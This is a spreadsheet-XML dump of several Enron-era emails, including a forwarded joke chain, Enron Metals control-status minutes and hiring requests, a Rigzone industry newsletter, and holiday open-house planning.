Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kevin.bosse@enron.com', 'jimmy.simien@enron.com'})</t>
  </si>
  <si>
    <t>Fw: GREAT BUMPER STICKER</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 11/21/2000 _x000D_
12:38 PM ---------------------------_x000D_
_x000D_
_x000D_
Dawn C Kenne_x000D_
11/21/2000 08:42 AM_x000D_
To: "Amanda Barnard" &lt;ajbarnard@houston.rr.com&gt;, Jennifer Baer _x000D_
&lt;jbaer1@maine.rr.com&gt;, Pam B Boxx/HOU/ECT@ECT, Michelle Bythewood _x000D_
&lt;rbwood@ix.netcom.com&gt;, "Bythewood, Richard" &lt;rbythewood@txi.com&gt;, "derek _x000D_
campbell" &lt;derek.campbell@paslode.com&gt;, PMDESMAR@earthlink.net, Linda J _x000D_
Ewing/HOU/ECT@ECT, "garynkay" &lt;GARYWGARRETT@email.msn.com&gt;, Darron C _x000D_
Giron/HOU/ECT@ECT, kristi.giron@cfisd.net, HeightsHappy@aol.com @ ENRON, _x000D_
"Keeling, Ingelisa" &lt;ikeeling@velaw.com&gt;, "B. Kenne" &lt;yona_edoda@yahoo.com&gt; @ _x000D_
ENRON, "don e kenne" &lt;donkit@tnaccess.com&gt; @ ENRON, Mark Troyer _x000D_
&lt;mtroyer@swbell.net&gt;, "Ray Vincent" &lt;raylvincent@hotmail.com&gt; @ ENRON, Eric _x000D_
Wardle/HOU/ECT@ECT, Gary Wilson &lt;gxwilson@us.oracle.com&gt;, "Tracey Wilson" _x000D_
&lt;twilson@officefurnishings.com&gt; @ ENRON, Jason Wolfe/NA/Enron@ENRON, Ed _x000D_
Zajicek &lt;e.zajicek@pentasafe.com&gt;, Phillip M Love/HOU/ECT@ECT, Victor _x000D_
Guggenheim/HOU/ECT@ECT, Matt Motsinger/HOU/ECT@ECT, Torrey _x000D_
Moorer/HOU/ECT@ECT, Sheri Thomas/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fw: GREAT BUMPER STICKER_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Dawn C Kenne/HOU/ECT on 11/21/2000 08:41 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Max &amp; Bev Fledderjohann" &lt;maxnbev@wesnet.com&gt; on 11/20/2000 10:23:12 PM_x000D_
To: "Jim" &lt;JUNAILBENDER@aol.com&gt;, "GARY" &lt;GARYWGARRETT@EMAIL.MSN.COM&gt;, _x000D_
&lt;DAWN.C.Kenne@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Fw: GREAT BUMPER STICKER_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: The Thiemans &lt;tthieman@nktelco.net&gt;_x000D_
To: Shirley Longworth &lt;johntl@bright.net&gt;; Nancy Roettger_x000D_
&lt;lroettger@woh.rr.com&gt;; Margene Howell &lt;Daisydog66@aol.com&gt;; Marcia Beneda_x000D_
&lt;Marshy54@aol.com&gt;; Judy and Larry Looker &lt;llooker@infinet.com&gt;; Jenny and_x000D_
Doug Combs &lt;ccombs@voyager.net&gt;; Gen Conradi &lt;gen1@bright.net&gt;; Bev_x000D_
Fledderjohnn &lt;maxnbev@wesnet.com&gt;; Becky Johnson_x000D_
&lt;bjohnson1@accesstoledo.com&gt;_x000D_
Date: Monday, November 20, 2000 2:55 PM_x000D_
Subject: Fw: GREAT BUMPER STICKER_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;----- Original Message -----_x000D_
&gt;From: Suchland, Bartt &lt;BSuchland@thieman.com&gt;_x000D_
&gt;To: Aaron Powers (E-mail) &lt;apowers@tampabay.rr.com&gt;; Annette (E-mail)_x000D_
&gt;&lt;anetrodnreel@hotmail.com&gt;; Chris Keller (E-mail) &lt;cbkeller@bright.net&gt;;_x000D_
Dan_x000D_
&gt;Suchland (E-mail) &lt;suchsnow@aol.com&gt;; Dar (E-mail) &lt;daltman@blueridge.net&gt;;_x000D_
&gt;'David Suchland' (E-mail) &lt;dsuchland@yahoo.com&gt;; Eric Koesters (E-mail)_x000D_
&gt;&lt;eric_koesters@motoman.com&gt;; Holdren (E-mail)_x000D_
&gt;&lt;kelly_holdren@precision-strip.com&gt;; Jay Jerger (E-mail)_x000D_
&gt;&lt;jerger@bgnet.bgsu.edu&gt;; Jim A. Jerger (E-mail) &lt;JergerJA@Maritz.com&gt;; Mark_x000D_
&gt;Turner (E-mail) &lt;tur_ner@yahoo.com&gt;; Mark Weeks (E-mail)_x000D_
&gt;&lt;marksallwet@yahoo.com&gt;; Matt Suchland (E-mail) &lt;Msuchland@hotmail.com&gt;;_x000D_
&gt;Michelle (E-mail) &lt;thieman@bright.net&gt;; Mike Tontrup (E-mail)_x000D_
&gt;&lt;firebird@bright.net&gt;; Nikki Mescher (E-mail) &lt;mescher10@hotmail.com&gt;; 'Ron_x000D_
&gt;Tenkman (E-mail) &lt;rtenkman@hotmail.com&gt;; Ryan Scheib (E-mail)_x000D_
&gt;&lt;rscheib@bright.net&gt;; Steve Williams (E-mail) &lt;ayzig@hotmail.com&gt;; Susan_x000D_
Fox_x000D_
&gt;(E-mail) &lt;susanf@b_x000D_
&gt;Sent: Friday, November 17, 2000 5:02 AM_x000D_
&gt;Subject: FW: GREAT BUMPER STICKER_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
 - GOre.jpg_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 06:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ted.murphy@enron.com', 'sally.beck@enron.com'})</t>
  </si>
  <si>
    <t>Enron Metals : Control Status MINUTES</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Mike Jordan/LON/ECT on 03/11/2000 14:16 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Tim Poullain-Patterson_x000D_
03/11/2000 14:05_x000D_
To: Mike Jordan/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Enron Metals : Control Status MINUTES_x000D_
_x000D_
fyi..._x000D_
---------------------- Forwarded by Tim Poullain-Patterson/LON/ECT on _x000D_
03/11/2000 14:07 ---------------------------_x000D_
_x000D_
_x000D_
Tim Poullain-Patterson_x000D_
03/11/2000 09:58_x000D_
To: Michael J Hutchinson/EU/Enron@Enron, Michael Farmer/EU/Enron@ENRON, Ed _x000D_
Dablin/EU/Enron@Enron, David P Tregar/EU/Enron@Enron, Fernley _x000D_
Dyson/LON/ECT@ECT, Robert Soeldner/LON/ECT@ECT, Mike Jordan/LON/ECT@ECT, _x000D_
Andrew Cornfield/LON/ECT@ECT, Howard Carter/EU/Enron@Enron, Kevin _x000D_
Rhodes/EU/Enron@Enron_x000D_
cc: Paul Chivers/LON/ECT@ECT, Tom McKeever/EU/Enron@Enron, Michael R _x000D_
Brown/LON/ECT@ECT _x000D_
_x000D_
Subject: Enron Metals : Control Status MINUTES_x000D_
_x000D_
All,_x000D_
_x000D_
Thank you for your attendance on Monday. I feel that it was a very _x000D_
constructive session._x000D_
_x000D_
I attach minutes - please note various actions - and advise of any omissions _x000D_
or errors._x000D_
_x000D_
_x000D_
_x000D_
Thanks and regards,_x000D_
Tim_x000D_
---------------------- Forwarded by Tim Poullain-Patterson/LON/ECT on _x000D_
02/11/2000 17:01 ---------------------------_x000D_
_x000D_
_x000D_
Tim Poullain-Patterson_x000D_
26/10/2000 19:06_x000D_
To: Michael J Hutchinson/EU/Enron@Enron, Michael Farmer/EU/Enron@ENRON, Tom _x000D_
McKeever/EU/Enron@Enron, Ed Dablin/EU/Enron@Enron, David P _x000D_
Tregar/EU/Enron@Enron, Fernley Dyson/LON/ECT@ECT, Paul Chivers/LON/ECT@ECT, _x000D_
Robert Soeldner/LON/ECT@ECT_x000D_
cc: Mike Jordan/LON/ECT@ECT, Andrew Cornfield/LON/ECT@ECT, Howard _x000D_
Carter/EU/Enron@Enron, Kevin Rhodes/EU/Enron@Enron _x000D_
_x000D_
Subject: Enron Metals : Control Status_x000D_
_x000D_
All,_x000D_
_x000D_
Please find attached the proposed agenda for next Tuesday's Control Status _x000D_
meeting._x000D_
_x000D_
_x000D_
_x000D_
A lot has been going on and this is an opportunity for Middle Office Support _x000D_
to highlight concerns to Commercial Management, ensure that our priorities _x000D_
are aligned and facilitate planning._x000D_
_x000D_
1) The Control Status part of the meeting will focus on:_x000D_
_x000D_
1.1) Overview - Operational Risk Assessment_x000D_
_x000D_
 See attached _x000D_
_x000D_
1.2) Resource Plan_x000D_
_x000D_
 See memo below detailing new hires we are seeking approval for..._x000D_
_x000D_
 Also appendices..._x000D_
_x000D_
 1.2.1) Orgainsation Chart _x000D_
_x000D_
 1.2.2) Rolling 6-Week AS400 IT Workplan _x000D_
_x000D_
2) The second part of the meeting will then focus on specific business _x000D_
issues:_x000D_
_x000D_
2.1) Inventory Management_x000D_
_x000D_
2.2) Project Cook_x000D_
_x000D_
2.3) FX/Rho Methodology_x000D_
_x000D_
2.4) Remote Offices_x000D_
_x000D_
Thanks and regards,_x000D_
Tim_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Tim Poullain-Patterson/LON/ECT on _x000D_
26/10/2000 18:06 ---------------------------_x000D_
_x000D_
_x000D_
Tim Poullain-Patterson_x000D_
04/10/2000 17:33_x000D_
To: Howard Carter/EU/Enron@Enron, Kevin Rhodes/EU/Enron@Enron, Andrew _x000D_
Cornfield/LON/ECT@ECT_x000D_
cc: Mike Jordan/LON/ECT@ECT, Melissa Pullar/LON/ECT@ECT _x000D_
_x000D_
Subject: Metals : Additional Headcount Requests_x000D_
_x000D_
Further to our discussion this morning, please find attached job descriptions _x000D_
and business justifications for the eight support vacancies and two IT _x000D_
vacancies we are currently looking to fill:_x000D_
_x000D_
1) Support : Merchanting &amp; Financial Trading_x000D_
_x000D_
_x000D_
_x000D_
In summary, these comprise:_x000D_
_x000D_
Risk Management &amp; Trade Accounting_x000D_
_x000D_
Merchanting - qual/part qual accountant to support daily P&amp;L production and _x000D_
analysis (partial coverage for maternity leave)_x000D_
_x000D_
Merchanting - qual accountant to support month end production, analysis and _x000D_
reporting as well as daily P&amp;L coverage_x000D_
_x000D_
Financial Trading - qual/part qual accountant to support daily P&amp;L production _x000D_
and analysis_x000D_
_x000D_
See also org chart for Risk &amp; Trade Accounting group _x000D_
_x000D_
Traffic/Co-ordination_x000D_
_x000D_
Mainly support for Copper activities in southern hemisphere - partial _x000D_
replacement for transfer to Operations_x000D_
_x000D_
Mainly flexible support for Lead, Tin and Zinc (partial coverage for _x000D_
maternity leave)_x000D_
_x000D_
See also org chart for Traffic group _x000D_
_x000D_
Inventory Financing Management_x000D_
_x000D_
Support implementation of Barclays off balance sheet structure - mainly _x000D_
tracking flows in/out of structure_x000D_
_x000D_
ditto_x000D_
_x000D_
See also org chart for Inventory Financing Management group  _x000D_
_x000D_
2) IT Development_x000D_
_x000D_
Owing to an increasing development workload including electronic bridging _x000D_
from AS400-LCH and EOL-AS400, automating the deal blotter, SAP, P&amp;L _x000D_
analytical tools, inventory management/tracking tools etc... _x000D_
_x000D_
See attached job descriptions   _x000D_
_x000D_
Approval for these proposed new hires should be obtained from Mike Farmer and _x000D_
Michael Hutchinson before we seek final sign-off from Michael Brown._x000D_
_x000D_
Thanks and regards,_x000D_
Tim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 15:25:31 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
=09=09=09[IMAGE]=09_x000D_
=09Wednesday January 9, 2002=09[IMAGE]   =09=09_x000D_
=09=09=09[IMAGE]=09_x000D_
=09=09=09[IMAGE]=09_x000D_
[IMAGE]=09=09 RIGZONE [IMAGE] [IMAGE] [IMAGE] =09[IMAGE]=09_x000D_
[IMAGE]=09=09home    | news    | search    | maps    | data    | jobs    | =_x000D_
market    | store  =09[IMAGE]=09_x000D_
=09=09=09[IMAGE]=09_x000D_
[IMAGE]=09=09      [IMAGE] [IMAGE]      In This Issue [IMAGE]      [IMAGE] =_x000D_
    [IMAGE]    Current Oil and Gas Industry News T! op Stories for the Past=_x000D_
 7 Days Featured Events and Conferences What's in Store - Books &amp; More     =_x000D_
Featured Employment Opportunities Surplus Oilfield Equipment For Sale World=_x000D_
wide Offshore Rig Utilization Oil &amp; Gas Prices    [IMAGE]   [IMAGE]       I=_x000D_
ndustry Headlines [IMAGE]      [IMAGE]       BP Scales Back Alaskan Operati=_x000D_
ons  BP has decided to downsize its staff in Anchorage and shelve its Liber=_x000D_
ty project at this time.  Collision Near Sleipner B Platform Averted  Emerg=_x000D_
ency measures were put into action when two fishing trawlers were seen head=_x000D_
ed for the unmanned Sleipner B platform.    [IMAGE]   ! [IMAGE]       Explo=_x000D_
ration [IMAGE]      [IMAGE]     [IMAGE] !  Ocean Energy Increases Acreage O=_x000D_
ffshore Angola  Ocean Energy acquires 35% interest in Block 10 offshore Ang=_x000D_
ola and will serve as operator.  Malaysia, Indonesia &amp; Vietnam Enter Joint =_x000D_
Venture   The national oil companies of Malaysia, Indonesia and Vietnam hav=_x000D_
e signed a joint venture agreement to explore for oil offshore Vietnam.  Ap=_x000D_
ache Hits Again in Egypt  Apache has completed the Khepri Well in Egypt's W=_x000D_
estern Desert.  The well tested at 29.5 million cubic feet of gas and 220 b=_x000D_
arrels of condensate per day.   PGS Takes Interest in Varg Field  PGS purch=_x000D_
ases Norsk Hydro's 42% share in License PL038 in the Norwegian sector of th=_x000D_
e North Sea.     [IMAGE]   [IMAGE]       Production [IMAGE]      [IMAGE]   =_x000D_
  [IMAGE]  PetroChina and Shell Sign Gas Pipeline Deal  PetroChina and Shel=_x000D_
l have entered into a preliminary agreement for an $18 billion East/West Ch=_x000D_
ina pipeline project.  KNOC To Ink Deal with PetroVietnam  KNOC is hoping t=_x000D_
o sign an agreement with PetroVietnam to receive gas from the Rong Doi fiel=_x000D_
d.  Jacobs Joins NAM Consortium  Jacobs Engineering has been awarded formal=_x000D_
 approval to become a member of the NAM Consortium.       [IMAGE]       Com=_x000D_
pany &amp; Financial News [IMAGE]      [IMAGE]     [IMAGE]  Kerr-McGee Announce=_x000D_
s 2002 Capital Budget  Kerr-McGee to allocate $310 million of its 2002 expl=_x000D_
oration and production budget for the North Sea.  Northern Offshore Announc=_x000D_
es Organizational Changes  Northern Offshore has moved its corporate office=_x000D_
s from Norway to Bermuda.  Landmark Opens New Office in Anchorage  Landmark=_x000D_
 Graphics has opened a new technical assistance support office in Anchorage=_x000D_
, Alaska.  EEX's 2001 Operations Review  EEX summarizes its 2001 U.S. and i=_x000D_
nternational operations activities.    [IMAGE]   [IMAGE]  advertisement  A =_x000D_
National-Oilwell designed, 1992 built modular offshore drilling rig is avai=_x000D_
lable for sale direct from the manufacturer.  This rig drilled only 5 wells=_x000D_
 from the Draugen platform in the Norwegian sector of the North Sea.  Click=_x000D_
 on the link below for full details, photos and seller contact information:=_x000D_
   http://www.rigzone.com/market/surplus_listing.asp?eq_id=3D397           =_x000D_
 Last 7 Days Top Stories [IMAGE]      [IMAGE]     [IMAGE]  Halliburton Says=_x000D_
 the Rumors Are Not True  Halliburton says there is no basis for the rumors=_x000D_
 that the company has filed for bankruptcy.  MMS Approves Use of FPSOs In G=_x000D_
ulf of Mexico  The U.S. Minerals Management Service has approved the use of=_x000D_
 FPSO vessels in the central and western portions of the Gulf of Mexico.  K=_x000D_
vaerner Receives Final Approval for Rescue Plan  Kvaerner has received appr=_x000D_
oval from the final group of lenders for the rescue plan that would merge K=_x000D_
vaerner and Aker Maritime.  Nabors Changes Corporate Structure  Nabors Indu=_x000D_
stries Board of Directors has approved a plan to reorganize the company and=_x000D_
 change its place of incorporation from Delaware to Bermuda.  Prosafe Award=_x000D_
ed FPSO Work Offshore Nigeria  Prosafe has been awarded an eight-year contr=_x000D_
act for an FPSO to work on the Abo field offshore Nigeria by a consortium l=_x000D_
ed by Agip.  Marathon Acquires Interests in Equatorial Guinea  Marathon has=_x000D_
 completed its acquisition of CMS Energy's interests in Equatorial Guinea f=_x000D_
or $993 million.  FMC Corporation Spins Off FMC Technologies  FMC Corporati=_x000D_
on has distributed all of its remaining shares in FMC Technologies making i=_x000D_
t a fully independent company.  SMOE Awarded North Sea Platform Contract  S=_x000D_
embCorp has been awarded a contract by Maersk for the installation of a pro=_x000D_
cess deck and accommodation module in the North Sea.  Marathon Begin! s Tra=_x000D_
ding on NYSE  Marathon Oil Corporation has begun trading on the New York St=_x000D_
ock Exchange as a standalone company following the separation of Marathon G=_x000D_
roup and U.S. Steel.  Unocal Increases Production Offshore Thailand  Unocal=_x000D_
 Thailand has plans to double the crude output in the Gulf of Thailand this=_x000D_
 year as part of a six-year development plan.  Newfield Makes Management Ch=_x000D_
anges  Newfield Exploration has made management changes in Australia and An=_x000D_
adarko Basin office locations.  Houston Exploration Completes Acquisition  =_x000D_
Houston Exploration finalizes South Texas property acquisition from Conoco =_x000D_
for $69 million.    [IMAGE]   [IMAGE]       Upcoming Oil &amp; Gas Industry Eve=_x000D_
nts [IMAGE]      [IMAGE]     [IMAGE]  Jan. 22    Alliances and Partnering i=_x000D_
n Oil &amp; Gas   Singapore Feb. 6     Torch Mid-Winter Energy Conference  New =_x000D_
York Feb. 7     Marine Construction 2002  Houston Feb. 10    2002 SPE Inter=_x000D_
national Petroleum Co! nference &amp; Exhibition in Mexico  Villahermosa Feb. 2=_x000D_
6    2002 IADC/SPE Drilling Conference and Exhibition   Dallas Feb. 27    H=_x000D_
uman Resources in Oil &amp; Gas  Aberdeen Mar. 10    AAPG Annual Meeting  Houst=_x000D_
on Apr. 9     2002 SPE/ICoTA Coiled Tubing Conference and Exhibition  Houst=_x000D_
on May. 6     Offshore Technology Conference 2002  Houston Aug. 27    ONS 2=_x000D_
002 Conference and Exhibition  Stavanger  list your conference  view upcomi=_x000D_
ng events   [IMAGE]   [IMAGE]    [IMAGE]    [IMAGE] [IMAGE]  INTEC  Horizon=_x000D_
 Offshore  Global Completion Service  HoverDril  DataLog   [IMAGE]   [IMAGE=_x000D_
]   promote your company      [IMAGE] [IMAGE]  [IMAGE]  Managing the Offsho=_x000D_
re Installation Workforce  [IMAGE] [IMAGE]  Accident Prevention Reference G=_x000D_
uide  [IMAGE] [IMAGE]  Safety and Security at Sea  [IMAGE]  [IMAGE]   [IMAG=_x000D_
E]   more products      [IMAGE] [IMAGE]  featured equipment: Nat! ional 132=_x000D_
0-UE, National 1320-M and Oilwell 840-E  [IMAGE]   Dreco 1000 UE  Land Rigs=_x000D_
  [IMAGE]   [IMAGE]   [IMAGE]   more equipment      [IMAGE] [IMAGE]   featu=_x000D_
red jobs:   - Senior Operations Manager   - Contract Manager   - Senior Pip=_x000D_
eline Engineer    more hot jobs &gt;&gt;    featured candidates:   - Petroleum En=_x000D_
gineer - Drilling &amp; Production   - Operations Coordinator   - Well Rounded =_x000D_
Petroleum Engineer    search for candidates &gt;&gt;  [IMAGE]   [IMAGE]     [IMAG=_x000D_
E] [IMAGE]   Drillships:  To 5000':   50.0% (7/14) +5000':   100.0% (25/25)=_x000D_
  Semisubs:  2nd Gen:   67.1% (49/73) 3rd Gen:   82.0% (41/50) 4th Gen:   1=_x000D_
00.0% (38/38) 5th Gen:  100.0% (7/7)   Jackups:  To 200':   56.7%  (38/67) =_x000D_
200' MC:   54.2% (13/24) 200' MS:   14.3% (3/21) 300' IC:   87.5% (84/96) +=_x000D_
300' IC:   88.9% (48/54) Severe Env.:   81.0% (17/21)  [IMAGE]   [IMAGE]   =_x000D_
view complete utilization report      [IMAGE] [IMAGE]  Light Crude Oil:  $2=_x000D_
0.73/BBL  (-3.49%) Brent Crude Oil:  $22.00/BBL  (0.14%) Natural Gas:  $2.2=_x000D_
9/MMBtu  (-29.32%) Unleaded Gasoline:  $0.59/gal  (3.51%) prices from:  1/8=_x000D_
/2002 change since:  1/7/2002  [IMAGE]   [IMAGE]    [IMAGE]  [IMAGE]    [IM=_x000D_
AGE]       Promotional Opportunities Become a Sponsor, feature your job ope=_x000D_
ning or, advertise your  upcoming industry conference.  Click here  for mor=_x000D_
e information, send your press release to  info@rigzone.com  or call us at =_x000D_
281-345-4040.   Member Services If you no longer wish to receive this newsl=_x000D_
etter, you may unsubscribe by clicking here  or by logging in to Rigzone an=_x000D_
d updating your profile.   You can also change the format you receive (HTML=_x000D_
 or Text) and your email address by logging in and updating your account.  =_x000D_
 Click here to log in .       [IMAGE]  =09=09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 00:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Update / Event Time Change</t>
  </si>
  <si>
    <t xml:space="preserve">This will be fine - just let me know when you are going to be gone._x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Anita DuPont@ENRON_x000D_
11/29/2000 05:01 PM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Update / Event Time Change_x000D_
_x000D_
Shirley, this is the committee that I discussed with you this morning.  The _x000D_
below email outlines the time required.  Thanks for your consideration._x000D_
_x000D_
Anita_x000D_
---------------------- Forwarded by Anita DuPont/NA/Enron on 11/29/2000 04:55 _x000D_
PM ---------------------------_x000D_
_x000D_
11/29/2000 04:46 PM_x000D_
Charla Reese@ENRON_DEVELOPMENT_x000D_
Charla Reese@ENRON_DEVELOPMENT_x000D_
Charla Reese@ENRON_DEVELOPMENT_x000D_
11/29/2000 04:46 PM_x000D_
11/29/2000 04:46 PM_x000D_
To: Daryl Kitchen@Enron Communications, Missy Stevens@ENRON, Misha _x000D_
Siegel@ECT, Zulie Flores/Corp/Enron@ENRON, Maggie _x000D_
Valles/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rose _x000D_
Rivera/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Donnis Traylor/HOU/EES@EES, _x000D_
Raquel Guerrero@ENRON COMMUNICATIONS, Elsie Lew@ECT, Mary _x000D_
Ellenberger/Corp/Enron@ENRON, Rebecca Longoria@ENRON, Joy Werner@ENRON, David _x000D_
Tagliarino@ECT, Janie Bonnard, Sylvia Thomas@ENRON, Lillian Villarreal@ENRON, _x000D_
Valerie Villareal/HOU/EES@EES, Stephanie Baker/HOU/EES@EES, Dianne _x000D_
Langeland/ENRON_DEVELOPMENT, Laura Schwartz@Enron, deb Gebhardt@ENRON, _x000D_
Heather Alon@ECT, Michael Cuccia/Corp/Enron@ENRON, Bert Frazier@ECT, Susan _x000D_
Rouse@EES, Sandy Lewelling@ENRON COMMUNICATIONS, Sonia Garcia/HOU/EES@EES, _x000D_
Dolores Escamilla@ECT, Anita DuPont/NA/Enron@ENRON_x000D_
cc: Elyse Kalmans@Enron, Greg Grissom@ENRON _x000D_
_x000D_
Subject: Update / Event Time Change_x000D_
_x000D_
Thanks to everyone for attending the meeting today! _x000D_
_x000D_
EVENT TIME CHANGE!!!_x000D_
I just spoke with the Office of the Chairman and have learned that Ken and _x000D_
Jeff are actually available during the morning of December 19th from 8:00am _x000D_
until 11:00am.  As a result, our plans have changed just a little and I have _x000D_
requested whether or not they are willing to pose for Polaroid pictures with _x000D_
employees - I'll let you know what I find out!  We will still have the jazz _x000D_
duet and informational poster displays in the lobby throughout the day and _x000D_
instead of dessert items, we'll order breakfast stuff._x000D_
_x000D_
ASSIGNMENTS / BUDGET!!!!_x000D_
Please note assignments below; for each team, collaborate between now and our _x000D_
next meeting to determine what purchases need to be made - budgets will be _x000D_
discussed at that meeting.  Again, it will be on Wednesday, December 6th from _x000D_
9:30am until 10:30am with the location TBD._x000D_
_x000D_
Kwanzaa - Daryl Kitchen* / Liz Taylor_x000D_
Chinese New Year - Elsie Lew* / Anita Dupont_x000D_
Las Posadas - Zulie Flores* / Maggie Valles / Lillian Villeral_x000D_
Christmas - Donnis Traylor* / Missy Stevens / Michael Cuccia_x000D_
Chanukah - Laura Schwartz* / Heather Alon_x000D_
Ramadan - Sylvia Thomas* / Janie Bonnard / Dianne Langeland_x000D_
St. Lucia - Joy Werner* / Stephanie Baker_x000D_
Devali - Sonia Garcia* / Sophie Patel / Rebecca Longoria_x000D_
Greeters / Traffic Control / Corsages - Sandy Lewelling_x000D_
Executive Floor - Deb Gebhardt_x000D_
Logistics - Charla Reese (Communication, Entertainment, Food, Picture Holders)_x000D_
Photographer - Laura Schwartz_x000D_
Houston Children's Choir - Misha Siegel_x000D_
_x000D_
* indicates Holiday Team Leader_x000D_
_x000D_
RESPONSIBILITIES_x000D_
Attend planning committee meetings and work with other volunteers assigned to _x000D_
your holiday._x000D_
Research meaning of holiday and determine appropriate decorations, symbols, &amp; _x000D_
food items - purchase after budget approval._x000D_
Create information sheet for employee hand-out._x000D_
Decorate between 7:00am and 8:00am on 12/19._x000D_
Be creative!  (play appropriate recorded music, dress up in related clothing, _x000D_
etc.)_x000D_
Ensure office is manned during open house (8:00am - 11:00am) - answer any _x000D_
questions, pass out materials, etc._x000D_
Recruit additional volunteers!_x000D_
_x000D_
ADDITIONAL VOLUNTEERS_x000D_
Delores Escamilla_x000D_
Val Villeral_x000D_
Raquel Guerrero_x000D_
Bert Frazier_x000D_
David Tagliarino_x000D_
Rose Riveria_x000D_
_x000D_
THANK YOU!_x000D_
_x000D_
Charla_x000D_
x35202_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Mar 2000 06:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Emissions website Text</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the copy._x000D_
_x000D_
I have already forwarded my comments and proposed changes to you via _x000D_
messenger this morning._x000D_
_x000D_
Subject those forwarded changes its looks fine to me._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Forster_x000D_
03/07/2000 11:38 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT, Harry M Collins/HOU/ECT@ECT_x000D_
cc: Jay Webb/HOU/ECT@ECT, Mario Parra Cardoso/Corp/Enron@Enron _x000D_
Subject: Emissions website Text_x000D_
_x000D_
_x000D_
Mark/Harry,_x000D_
_x000D_
Attached is a copy of the website text._x000D_
_x000D_
Please review and approve or suggest changes. We would like to be able to _x000D_
start uploading this information later today, if possible._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave_x000D_
---------------------- Forwarded by David Forster/LON/ECT on 03/07/2000 05:36 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Mario Parra Cardoso@ENRON_x000D_
03/07/2000 04:07 PM_x000D_
To: David Forster/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Emission Auctions: now with Louise's changes_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 08:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ECOutlook Term Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">As per our telephone call._x000D_
----- Forwarded by Mark Taylor/HOU/ECT on 01/08/2001 04:37 PM -----_x000D_
_x000D_
	Tommy Yanowski/ENRON@enronXgate_x000D_
	01/05/2001 11:11 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: Philippe A Bibi/HOU/ECT@ECT_x000D_
		 Subject: ECOutlook Term Sheet _x000D_
_x000D_
Attached is a copy of the term sheet that we discussed over the phone.  _x000D_
Please review and let me know how you'd like to move forward.  Thanks!  -  _x000D_
Tommy_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 09:16:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'carlos.giron@psiusa.com'})</t>
  </si>
  <si>
    <t>Fwd: Ground Zero</t>
  </si>
  <si>
    <t xml:space="preserve">Date: Fri, 19 Oct 2001 09:53:45 -0500_x000D_
From: "Mike Kotar" &lt;Mike.Kotar@psiusa.com&gt;_x000D_
To: Carlos.Giron@psiusa.com,Clint.McDowell@psiusa.com,	Stephanie.McDonald@psiusa.com_x000D_
Subject: Fwd: Ground Zero_x000D_
Mime-Version: 1.0_x000D_
Content-Type: message/rfc822_x000D_
_x000D_
Received: from femail40.sdc1.sfba.home.com	([24.254.60.34])	by psiusa.com; Fri, 19 Oct 2001 09:48:07 -0500_x000D_
Received: from HeatherWasgatt ([65.13.49.215])          by femail40.sdc1.sfba.home.com          (InterMail vM.4.01.03.20 201-229-121-120-20010223) with SMTP          id &lt;20011019144834.HICT25699.femail40.sdc1.sfba.home.com@HeatherWasgatt&gt;;          Fri, 19 Oct 2001 07:48:34 -0700_x000D_
Message-ID: &lt;002e01c158ae$ccda58e0$d7310d41@sctdl1.az.home.com&gt;_x000D_
From: "Heather Wasgatt" &lt;hwasgatt@home.com&gt;_x000D_
